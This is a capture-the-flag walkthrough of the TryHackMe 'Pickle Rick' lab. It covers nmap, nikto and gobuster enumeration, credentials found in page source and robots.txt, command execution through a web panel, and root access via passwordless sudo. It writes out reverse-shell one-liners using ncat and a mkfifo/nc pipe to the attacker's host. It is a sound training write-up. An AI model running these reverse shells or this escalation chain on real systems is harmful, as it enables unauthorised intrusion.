This article is a write-up of the TryHackMe Room “Pickle Rick”. I will explain my way of tackling this room and show you the solution that worked for me. No flags will be shown!
Link to the room: https://tryhackme.com/room/picklerick
Time: 15-30 minutes, depending on your knowledge
Table of Contents
- Connect to the TryHackMe VPN and find your IP address
- Start the room and note the IP address of your server
I suggest you create a variable of the IP address in your terminal instance – This makes it easier to follow my guide.
All commands are tested on a „fresh“ Kali Linux installation. If you are using a different OS, you might need to change parts of these commands.
Task 1: What is the first ingredient Rick needs?
As always we want to start with enumerating the target. We will start with nmap to see the possible attack vectors.
> nmap -sC -sV $IP ┌──(diddy㉿kali) └─$ nmap -sC -sV $IP Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-07 21:46 CET Nmap scan report for 10.10.242.71 Host is up (0.037s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 77b416abb7da3568c0418343b10f3b37 (RSA) | 256 300d26e4d9488c850140ccc3fe0af8ca (ECDSA) |_ 256 a666cb029cf4e6265829454c8f97bc2d (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Rick is sup4r cool Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.01 seconds
As we can see the server has port 22 & 80 open. Let’s get gobuster and nikto up to check for interesting directories and other useful information. While these tools are running we can check out the website that is served on port 80.
There is nothing interesting on first glance but if we check out the source code we can find the first hint.
<!-- Note to self, remember username! Username: ********* -->
Nice, let’s write that down for later!
Nikto and gobuster should be done by now so let’s see what the result is:
┌──(diddy㉿kali) └─$ nikto --url http://$IP - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.242.71 + Target Hostname: 10.10.242.71 + Target Port: 80 + Start Time: 2022-11-07 21:49:39 (GMT1) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Server may leak inodes via ETags, header found with file /, inode: 426, size: 5818ccf125686, mtime: gzip + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + Cookie PHPSESSID created without the httponly flag + OSVDB-3233: /icons/README: Apache default file found. + /login.php: Admin login page/section found.
The last line from nikto looks interesting, let’s note that for later.
┌──(diddy㉿kali)-[~] └─$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt dir -u http://10.10.242.71 =============================================================== Gobuster v3.3 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.242.71 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.3 [+] Timeout: 10s =============================================================== 2022/11/07 21:55:26 Starting gobuster in directory enumeration mode =============================================================== /assets (Status: 301) [Size: 313] [--> http://10.10.242.71/assets/] Progress: 81620 / 81644 (99.97%)=============================================================== 2022/11/07 22:01:42 Finished ===============================================================
Gobuster did not find anything useful. The /assets directory contains a few neat images and gifs but nothing that would help us here.
Let’s check out the login page.
While we do have a username, we do not have a password. We could use brute force but there is one more place where we can check for hints. Mosts websites have a /robots.txt that tells crawlers which sites they can access and which sites they can’t. Maybe there is something useful in that file? Indeed! While we cannot be 100% sure what that is, it looks like a password.
Together with the username we found earlier we should be able to log in.
We are greeted with a “Command Panel”. This command panel accepts bash commands and outputs the result. Let’s try some commands.
> ls Sup3rS3cretPickl3Ingred.txt assets clue.txt denied.php index.html login.php portal.php robots.txt
These two files look interesting, let’s see what’s inside them.
> cat Sup3rS3cretPickl3Ingred.txt
Okay, that did not work. Seems like cat is disabled. Let’s try something else.
> less Sup3rS3cretPickl3Ingred.txt **. ****** ****
That works. We have our first ingredient. Now let’s see what the clue is.
> less clue.txt Look around the file system for the other ingredient.
Alright, easy enough.
Task 2: Whats the second ingredient Rick needs?
How about we check for all users with a home directory?
> ls /home rick ubuntu > ls /home/rick second ingredients
Looks like the second ingredient is located in the home directory of Rick. Let’s check it! Don’t forget to escape the space in “second ingredient”.
> less /home/rick/second\ ingredient * **** ****
Alright, so far so good.
Task 3: Whats the third ingredient Rick needs?
Now we only need to find the last ingredient. Since the final answer is usually located in the /root directory we need to escalate our privileges to the root user first, or need a way to execute commands with sudo permissions.
Now there are two ways that I found on how to access the last ingredient. I am not sure which one the intended way is but let's start with the easy one. If you are curious you can check out the "harder" one after this.
Task 3.1 The easy way
As per tradition, the last answer is located in the /root directory. This directory can only be accessed by the root user or a user with root privileges. A simple way to can check if a user has sudo permissions is to execute a command like ls with sudo. If there is any output, the user has sudo permissions.
> sudo ls Sup3rS3cretPickl3Ingred.txt assets clue.txt denied.php index.html login.php portal.php robots.txt
Yup, there is the output. Seems like the user running the web server (www-data) has sudo permission WITHOUT a password. That is bad. Let’s find the final ingredient.
> sudo ls /root 3rd.txt snap > sudo less /root/3rd.txt 3rd ingredients: ***** *****
With this answer we have completed the room. Nice!
Task 3.2 The hard way
Since I did not think that this room would give me the last answer that easily, I started an nc reverse shell with the command panel.
On my local machine I started an nc listener with:
> nc -lnvp $PORT
In the command panel I tried to execute this command to create the shell:
> ncat -e /bin/bash $YOURIP $PORT
The first command I tried was disabled, so I used this one: CREDIT
> rm -f /tmp/b; mkfifo /tmp/b; /bin/sh -i 2>&1 0</tmp/b | nc $YOURIP $PORT 1>/tmp/b
┌──(diddy㉿kali) └─$ nc -lnvp 4444 listening on [any] 4444 ... connect to [10.8.21.146] from (UNKNOWN) [10.10.242.71] 45248 /bin/sh: 0: can't access tty; job control turned off $ whoami www-data $ hostname ip-10-10-242-71 $
Next I tried to gain access to the root user with:
> sudo su > whoami root
And then finally I tried finding the third ingredient in the root directory.
> ls /root 3rd.txt snap > less /root/3rd.txt 3rd ingredients: ***** *****
Was it overkill? Yes. Was it way more fun? Absolutely!
That was the room “Pickle Rick”. I hope everything was clear. If not, please let me know. I will try to answer all questions that come up.